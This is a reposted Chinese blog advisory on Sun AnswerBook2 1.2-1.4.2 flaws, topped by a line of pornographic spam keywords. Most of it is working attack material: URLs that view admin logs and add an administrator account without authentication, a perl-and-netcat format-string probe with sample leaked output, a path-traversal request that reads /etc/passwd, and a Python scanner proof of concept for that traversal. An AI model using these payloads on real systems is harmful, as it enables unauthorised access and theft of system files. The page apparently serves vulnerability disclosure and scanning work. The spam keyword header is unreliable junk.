日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Sun公司的产品AnswerBook存在多种漏洞

發(fā)布時間:2025/6/17 编程问答 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Sun公司的产品AnswerBook存在多种漏洞 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

一、未授權管理腳本訪問漏洞:

1、受影響版本:

Sun-AnswerBook2? ? ?1.2-1.4.2

2、攻擊測試手段

http://a.b.c.d:8888/ab2/@AdminViewError#訪問錯誤日志?

http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#添加賬戶(密碼)

二、遠程格式化字符串漏洞

1、受影響版本:

Sun-AnswerBook2? ? ?1.2-1.4.2

2、攻擊測試手段:

1 perl -e 'print"GET /";print"%x"x20;print" HTTP/1.0\r\n\r\n\r\n"' | nc localhost 8888

應該可以看到如下報錯:

http-8888 [23/Sep/2000:13:09:37 -0700] warning: send-file reports: The?
requested object "/usr/lib/ab2/data/docs/0fea19f580073656e642d66696c6520?
7265706f7274733a2054686520726571756573746564206f626a65637420222f7573722f6?
c69622f6162322f646174612f646f63732f" could not be opened!

三、任意文件讀取(有些HTTP-Proxy也有這個漏洞):

直接連接connect漏洞主機的對應的端口()

發(fā)送Payload

1 GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n

就可以得到對應的文件內容

?

參考巡風的POC:

1 def check(ip, port, timeout): 2 try: 3 socket.setdefaulttimeout(timeout) 4 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 s.connect((ip, int(port))) 6 flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n" 7 s.send(flag) 8 data = s.recv(1024) 9 s.close() 10 if 'root:' in data and 'nobody:' in data: 11 return u"漏洞" 12 except: 13 pass

?

轉載于:https://www.cnblogs.com/KevinGeorge/p/8087270.html

總結

以上是生活随笔為你收集整理的Sun公司的产品AnswerBook存在多种漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。